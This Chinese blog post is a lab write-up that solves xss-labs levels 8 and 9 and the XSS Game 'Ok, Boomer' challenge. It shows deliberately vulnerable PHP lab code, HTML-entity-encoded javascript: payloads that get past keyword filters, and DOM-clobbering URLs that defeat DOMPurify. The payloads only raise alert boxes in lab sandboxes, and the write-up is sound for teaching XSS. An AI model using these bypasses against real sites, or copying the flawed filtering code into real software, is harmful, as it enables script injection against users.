xss-labs第八、九关卡以及XSS GAME的Ok,Boomer关卡

第八关

靶场代码

php 复制代码
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level9.php?keyword=not bad!"; 
}
</script>
<title>欢迎来到level8</title>
</head>
<body>
<h1 align=center>欢迎来到level8</h1>
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);

echo '<center>
<form action=level8.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
 echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
?>
<center><img src=level8.jpg></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>";
?>
</body>
</html>

代码分析

关键点:

  • 字符串过滤:在代码中,输入参数keyword经过一系列的str_replace操作,目的是为了替换一些危险的HTML和JavaScript关键字,如script、on、src、href等。

所以我们可以考虑一下,能不能使用HTML实体编码

html 复制代码
&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x31;&#x29;

第九关

靶场代码

php 复制代码
<!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level10.php?keyword=well done!"; 
}
</script>
<title>欢迎来到level9</title>
</head>
<body>
<h1 align=center>欢迎来到level9</h1>
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php

if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}
?>
<center><img src=level9.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>";
?>
</body>
</html>

代码分析

这关于第八关,大差不差

关键点:

  • strops():查找了子字符串中是否含有http://

所以,变通一下,在alert()中,使用http://

html 复制代码
&#x6a;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3a;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;http://&#x27;&#x29;

注意:

在alert中,如果不是使用数字,则必须要添加引号,由于引号被过滤了,所以,也要进行HTML实体编码

XSS GAME的Ok,Boomer关卡解体思路

XSS GAME靶场关卡网址

代码片段

html 复制代码
<h2 id="boomer">Ok, Boomer.</h2>
<script>
    boomer.innerHTML = DOMPurify.sanitize(new URL(location).searchParams.get('boomer') || "Ok, Boomer")
    setTimeout(ok, 2000)
</script>

代码分析

关键点:

  • DOMPurify.sanitize:这是一个DOMPurify库,是一个用于防止XSS跨站攻击的JavaScript函数,用来对HTML字符串代码"消毒",移除恶意字符串
  • new URL(location).searchParams.get('boomer'):通过创建一个URL对象,解析当前页面完整的URL,从URL查询参数,获取boomer的值
  • setTimeout(ok, 2000):这是一个定时器函数,用于延迟执行某个函数,即,执行ok

通过上面的几个关键点,首先排除了常规的方式(排除所有的javascript代码),那么,现在能实现payload的地方只有setTimeout了,也就是如何才能执行ok
现在面临的问题是:ok变量不存在,因此无法执行
思考:是否能够自己定义一个ok变量,如何定义是其执行ok

方法(DOM Clobbering)

什么是DOM Clobbering?

简单来说,通过注入HTML元素,创建一个javascript变量

首先了解一下:setTimeout(functionRef,time)

既然要使用setTimeout这个函数就要了解一下,这个函数机制
setTimeout在可以处理函数,但是,在处理非函数时,调用toString()

解释:

  • JavaScript会尝试将ok转换为字符串,相当于String(ok)
  • 之后,JavaScript执行这个字符串,等于eval(Sring(ok))

而含有toString()方法的标签每个元素都有,但是大部分是HTMLElement.prototype.toString(),也就是继承父类的标签,这种标签返回的是[object HTMLXXXElement]

比如:

js 复制代码
console.log(document.createElement("div").toString()); 
// 输出: "[object HTMLDivElement]"

console.log(document.createElement("p").toString()); 
// 输出: "[object HTMLParagraphElement]"

因此,我们要使用覆盖父类的toString()方法的标签,他可以返回href

比如:<a></a><area>

确定好使用什么标签进行payload后,就要查看DOMPurify库的白名单了,也就是如何才能不通过交互的方式进行弹窗:mailto、tel等等

最后进行payload:

url 复制代码
https://sandbox.pwnfunction.com/warmups/ok-boomer.html/?boomer=%3Carea%20id=%27ok%27%20href=%27mailto:alert(1337)%27%3E
url 复制代码
https://sandbox.pwnfunction.com/warmups/ok-boomer.html/?boomer=%3Ca%20id=%27ok%27%20href=%27mailto:alert(1337)%27%3E%3C/a%3E
相关推荐
浪遏17 分钟前
我的远程实习(二) | git 持续更新版
前端
不羁。。40 分钟前
【操作系统安全】任务3:Linux 网络安全实战命令手册
linux·安全·web安全
智商不在服务器42 分钟前
XSS 绕过分析:一次循环与两次循环的区别
前端·xss
神经毒素42 分钟前
WEB安全--SQL注入--DNSlog外带
安全·web安全
MonkeyKing_sunyuhua1 小时前
npm WARN EBADENGINE required: { node: ‘>=14‘ }
前端·npm·node.js
Hi-Jimmy1 小时前
【VolView】纯前端实现CT三维重建-CBCT
前端·架构·volview·cbct
janthinasnail2 小时前
编写一个简单的chrome截图扩展
前端·chrome
拉不动的猪2 小时前
刷刷题40(vue中计算属性不能异步,如何实现异步)
前端·javascript·vue.js
冴羽yayujs2 小时前
SvelteKit 最新中文文档教程(6)—— 状态管理
前端·javascript·vue.js·前端框架·react·svelte·sveltekit